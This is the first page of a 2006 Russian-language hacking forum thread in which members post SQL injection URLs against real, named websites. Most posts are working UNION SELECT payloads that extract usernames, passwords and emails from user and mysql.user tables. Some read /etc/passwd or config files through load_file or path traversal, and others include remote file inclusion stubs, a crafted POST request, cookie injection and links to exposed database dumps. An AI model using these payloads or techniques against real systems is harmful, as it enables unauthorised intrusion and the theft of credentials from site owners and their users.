Форум АНТИЧАТ
Страница 1 из 311 1 2 3 4 5 1151101 > Последняя »
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=21336)

m0nzt3r 04.07.2006 18:58
Sql Инъекции
 
Постим здесь скуль инъекции! Флейм/оффтоп будет жестоко удаляться + будет испорчена репа.
Перед тем как запостить инъекцию, проверьте не выкладывалась ли она ранее:

========> АНТИБОЯН <========

Вбиваем site:forum.antichat.ru "СЮДА СВОЮ СКУЛЬ" и жмём эту кнопочку. Всё просто!!!

Попробуй, тебе понравится!!!

--------------------------------------------------------------------------------------------------------------

Правила этой темы:

1.

Что бы избежать дальнейших накруток и притензий, ограничтесь при выставление репутации в этой теме её колличеством от 1 до 3.
При оценивание постов в этой теме, старайтесь сделать это как можно более рационально - не стоит ставить +3 за не полностью раскрученную инъекцию.


Многие инъекции, которые вы выкладываете, "не доведены до ума", иногда кажется, что это всё выкладывается только, что бы запостить пост и показать, что ты умеешь делать sql инъекции, в результате получается большая активность. Только толку от неё нету, пробуйте не просто подбирать кол-во колонок, выводить инфу о БД, но и подбирать таблицы и имена колонок.

2.

Инъекции вида:

Код:
http://site.ru/index.php?a='
будут удаляться.

3.

По причине участившихся дефейсов принято решение не публиковать в теме пароли и хеши к админкам

Они будут удаляться, а нарушители наказываться

podkashey 04.07.2006 20:23
Как увидел тему, сразу захотелось стать ПервоНахом. Думал, где искать скули и на ум почему-то пришли только они - ПИДОРЫ. гыггыг
Итог: http://www.gaycentral.ru/news/?id=30'
Правда дальше не копался.
Думаю, что будет удобно новичкам, так как виден полный текст запроса.
Дальше, снизу было написано Made by KAMOV Media (gayly.ru)
После чего было найдено http://www.gayly.ru/news/archive/?year=2'005&month=12 аналогично.
АнтиПидорсОфАнтичат. ;)
P.S. Монстер, с тебя простава мне, как первонаху.... гыгыгыгг

bandera 06.07.2006 00:59
_http://csmania.ru/modules.php?name=Articles&pa=showarticle&articles_ id=8'
Улыбнуло -)

kissa 08.07.2006 17:42
ht~tp://www.patrickharviemsp.com/index.php?page=news.php&story=49%20union%20select% 201,2,3,4,5/*

degeneration x 12.07.2006 12:11
TV-CLUB.RU(его рекламу по Ren-TV крутят)


_http://tv-club.ru/catalog.php?id=-7+union+select+name+from+users+where+id=user_id/*

_http://tv-club.ru/catalog.php?id=-7+union+select+password+from+users+where+id=user_i d/*

_http://tv-club.ru/catalog.php?id=-7+union+select+email+from+users+where+id=user_id/*

Dracula4ever 12.07.2006 16:23
_http://www.mediaprovinces.kz/index.php?r=8c=174'9

blackybr 12.07.2006 17:19
_http://ganjubass.com/info.php?id=999999999999+union+select+1,2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35/* (вобще сайт сам одна большая скуль)

_http://www.lion.kz/show_news.php?id=872%27

Dracula4ever 12.07.2006 17:30
_http://livestats.micromir.com/view.php?order=ip&pg=5'

Дикс 12.07.2006 20:24
http://cs-maps.org/index.php?page=maplist.php&type=dm&source=N&sort=d ate'&pageno=1
мои пять копеек :)

Dracula4ever 12.07.2006 20:42
_http://www.fitness.ru/clubs/timetable.phtml?ClubID=17'

Dracula4ever 13.07.2006 17:25
_http://www.zapaxa.net/?act=detail&id=23'3

_http://www.elabuga.ru/virt1.phtml?rait=7&cat=1'3

_http://www.fitness.ru/clubs/timetable.phtml?ClubID=1'7

_http://www.0577.ru/imode/south/?winers=33'

Dracula4ever 15.07.2006 23:54
_http://parnas.baltika.ru/forum/?rand=35191&fold_id=14&forumid=1'

degeneration x 17.07.2006 03:29
_http://gsmfilm.ru/page.php?page=-102+union+select+111,222,333/*

Dracula4ever 17.07.2006 08:49
_http://avtostarter.com/obzor.php?page=1'

podkashey 23.07.2006 23:14
Для тех, кому не по душе клубик ЦСКА. ;)
Код:
http://www.peski.ru/gbook/find/index.php?nik=88&pr1=%3E%3D&d1=16&m1=07&y1=2006&pr2=%3C%3D&d2=23&m2=07&y2=2006&invis=1&mess=88'/*&mail=88&ipf=88&sort=0
Правда не получилось даже кол-во столбцов подобрать - до 30и пробовал примерно и заипался. Там еще где-то скуль-инж была, но не помню где уже.

Azazel 29.07.2006 11:20
Код:
http://www.swadba.by/include.php?dir=http://
http://www.4webhelp.net/tutorials/?cid=9%20union%20select%20user_password,2,3,4,5,6%20from%20users/*-
http://www.driftscenter.dk/page.php?emne_id=3%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*-
http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from%20users%20where%20nick=admin%2527/*-
http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email,555,666,777,888,999%20from%20user%20limit%201000/*-
http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_members/*-
http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from%20users%20limit%203,4/*
http://www.nhia.edu/news.php?id=13%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*-
http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,username,3,password,5,6,7,8,9%20from%20users/*-
http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,load_file('/etc/passwd'),4,5,6,7,8/*-
http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20111,222%20from%20affiliates/*-
http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,email,password%20from%20users/*-
http://www.greenshift.com/news.php?id=5555555555%20union%20select%201,2,user,4,password,6,7,8,9,0,1,2%20from%20mysql.user%20limit%203,4/*
http://www.jerusalemfoundation.org/news.php?id=-143%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
http://www.bendruomenes.lt/news.php?id=9999999999%20union%20select%201,2,username,4,5,password,7,8,9,0%20from%20users%20limit%2010,15/*
http://www.dadcomehome.org/en/news.php?id=9999999999%20union%20select%201,2,3,4,Password,6,7,8,9,0,1,2,3,4%20from%20mysql.user/*
http://www.thestra.com/news.php?type=article&id=93%20union%20select%200,0,password,0,0%20from%20mysql.user/*
http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0%20from%20users/*
http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from%20orders/*
http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8,9,0,1/*
http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,user,password,4,5,6,7,8,9,0,1,2%20from%20mysql.user/*
http://insolution.at/news.php?id=../../../../../etc/passwd
http://www.pixelvalley.com/news/news.php?id=874%20union%20select%20password,2,3%20from%20mysql.user/*
http://www.dslvalley.com/news/news.php?id=874%20union%20select%20password,2,3%20from%20mysql.user/*
http://smartphone.to.pl/news.php?id=55555555%20union%20select%201,parol,3,4,5,6,7%20from%20user/*
http://www.depot.com.ar/chat/web/admin/extentions.php
http://www.evergreencc.com/calendar/payment.php?insPath=http://

zyl 29.07.2006 21:47
Вот красивый сайтик, но....
Код:
_http://bknt.ru/library/?cat=2609\'/*иid=1916
З.Ы.: Кому не лень почитайте статейку без \'/* - познавательно! =)

w00lf 31.07.2006 01:27
Я на шел вот странички
cvs.php.net/viewcvs.cgi/php-master-web/users.sql
wiki.cs.cityu.edu.hk/src/users.sql
Можно ли, что-нибудь с ними сделать

degeneration x 01.08.2006 14:52
_http://www.dreamtech.ru/Kino/CardView.phtml?id=-1 union select 1,2,3,4/*

DIAgen 01.08.2006 16:00
_http://www.sibdosug.com/details.php?id=310'
Я там так и не смог подобрать число столбцов(((
А по идеи весь этот сайт полная sql-inj

Dracula4ever 03.08.2006 09:47
давно я сюда не заходил...

_http://porto.com.ua/?pg=catalog

podkashey 03.08.2006 11:47
Цитата:
давно я сюда не заходил...

_http://porto.com.ua/?pg=catalog
А в чем смысл этой ошибки, если не секрет? Где здесь скуль-инж? Как его применить?

http://www.calibra-club.ru/profileclub.php?mode=viewprofile&u=17'
Правда дальше раскопать не получилось. Такое чувство, что это не скуль, а подстава.

DIAgen 03.08.2006 12:07
http://test.acunetix.com/artists.php?artist=3333 union select 111,222,333/*-
Так просто разберался со сканером, вот решил посмотреть что они предлагают для тестирования)))

blackybr 03.08.2006 16:41
2podkashey http://porto.com.ua/?pg=phpinfo =)

Go0o$E 03.08.2006 21:06
Два провайдера:
http://medialite-net.ru/about\'

http://sknt.ru
В cookies: KEngineSession: \' union select 1,2,3,4,5/*

degeneration x 03.08.2006 21:30
la2info.ru

Код:
_http://la2info.ru/db.php?action=npcs(АМПЕРСАНД)npcid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*
P.S. с амперсандом фигня какая-то, не отображается.

@lcash 03.08.2006 23:06
http://www.supercomputingonline.com/article.php?sid=2252
http://www.worthplaying.com/article.php?sid=31196
http://www.gamingreport.com/article.php?sid=21543

Tem 04.08.2006 00:19
Go0o$E

Вот тебе база http://medialite-net.ru , _http://emiq.nm.ru/bacup.sql качай )))

degeneration x 04.08.2006 13:06
SQL injection на injection.ru =))

Код:
_http://injection.ru/?id=-1 union select 1,2,3,4,5,6,7,8,9/*

-dp- 04.08.2006 19:59
Цитата:
Go0o$E

Вот тебе база http://medialite-net.ru , _http://emiq.nm.ru/bacup.sql качай )))
Написал бы как скачал сразу =))

install/upgrade.php
install/upgrade_301.php?step=\'

atall v.5 05.08.2006 02:32
epidem.ru


http://epidem.ru/modules.php?name=News&pagenum=\'

podkashey 05.08.2006 02:50
Цитата:
http://epidem.ru/modules.php?name=News&pagenum=\'
server version for the right syntax to use near '-10, 10' at line 1
ИМХО скуль в LIMIT находится, смысла поэтому в нем не много. ;)

Для тех кто хочет покопаться в Postgresql:
http://club.veresk.ru/?part_id=18-1%20union%20select%20version()

LordNet 10.08.2006 15:19
Вот нашел:
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,555/*

После 20 мин получилось вот такое )) :
Код:
http://www.britishcat.ru/articles.html?Action=ShowArticle&Article=8-1+union+select+111,222,333,444,CONCAT('ID=',id,'%20Login=',Login,'%20Passord=',password,'%20Mail=',%20email,'%20ICQ=',icq)+from+users/*
Может, кто захочет дальше поковырять.

Dagon 11.08.2006 13:17
sql иньекция в сбербанке )

http://www.vsb.vrn.ru/vbank/branches.asp?bk=1%20UNION%20SSS

Go0o$E 13.08.2006 19:04
Sql на www.territory.ru

POST http://www.territory.ru/info/news/index.php?show=cat&id=0 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.territory.ru
Content-Length: 57
Connection: Close
Pragma: no-cache

show=login&login='&password=123email@123.com

2 Tem
Если сможешь тут слить базу, ОЧЕНЬ буду признателен, если скинешь ее и мне. 8)

w00lf 17.08.2006 10:10
https://secure.mysociety.org/ cvstrac/getfile/mysociety/twfy/db/users.sql

home.southernct.edu/~dorrt1/work/lablog/admins.sql

members.home.nl/j.fridzema/database.sql

Azazel 18.08.2006 20:59
Вот, поднакопилось.
Код:
http://www.4webhelp.net/tutorials/?cid=9%20union%20select%201,2,user_password,4,5,6%20from%20users/*
http://www.ipworld.only.pl/portal/articles.php?topic=-18%20union%20select%20111,pass,333,444,555%20from%20users/*-
http://www.gamersinfo.net/content/news.php?id=-168%20union%20select%20111,username,password,email,555,666,777,888,999%20from%20user/*-
http://www.dailynews-tsn.com/news.php?id=2163'%20union%20select%201,2,3,4,5,6,7,8,9,load_file('/home2/tsnweb/dailynews-tsn-www/db_fns.php'),1,2,3,4,5,6,7,8,9%20from%20tsn_members/*-
http://www.dynamomania.com/news.php?p=message&id=-20242%20union%20select%201,2,email,pwd,5,6%20from%20users%20limit%203,4/*
http://www.foodheart.org/news/news.php?id=55555555555%20union%20select%201,username,3,password,5,6,7,8,9%20from%20users/*-
http://staging.aiap.it/news.php?ID=-754%20union%20select%201,2,3,4,5,6,7,8/*-
http://webpagemaintenance.com/article.php?id=444444444444444%20union%20select%20111,222/*-
http://www.nasar.org/nasar/news.php?id=6666666666666%20union%20select%201,2,email,password%20from%20users/*-
http://www.hispanicprwire.com/news.php?l=in&id=-640%20union%20select%201,2,3,4,5,6/*
http://www.losingtoday.com/news.php?id=-1475%20union%20select%201,2,3,4,5,6,7,8,9,0/*
http://www.agh.edu.pl/news.php?id=-389%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5/*
http://www.reusablebags.com/news.php?id=-17%20union%20select%201,email,3,4,5,6,7,8,9%20from%20orders/*
http://www.statistica.md/news.php?lang=ru&id=12666666666%20union%20select%201,2,3,4,5,6,7,8,9,0,1/*
http://kmi4schools.e2bn.net/rostra/news.php?r=1&t=2&id=555555555%20union%20select%201,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20account/*
http://fat-cat.co.uk/fatcat/news.php?id=44444444444%20union%20select%201,22,33,4,5,6,7,8,9,0,1,2/*

gibson 20.08.2006 22:39
вот еще одна
http://albatros.uz/index.php?option=content&task=view&id=6&Itemid=30'

1SeTh 25.08.2006 23:54
а вот на wap.wab.ru
при отправке письма выдает:
Ошибка при отправке письма! Попробуйте еще раз.
ERROR You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'Юзернейм')and(idtowhom = '515488')and(topic = ''') limit 1' at lin

aleks28 17.09.2006 10:45
Вот нашел только вот толку маловато наверно, так как я не могу найти таблицу users
_http://www.yuretz.ru/prikol.php?id=470+union+select+0,1,2,3,4,5,6,7,8,9 ,10,11/*


Время: 23:49
Страница 1 из 311 1 2 3 4 5 1151101 > Последняя »
Показывать 40 сообщений этой темы на одной странице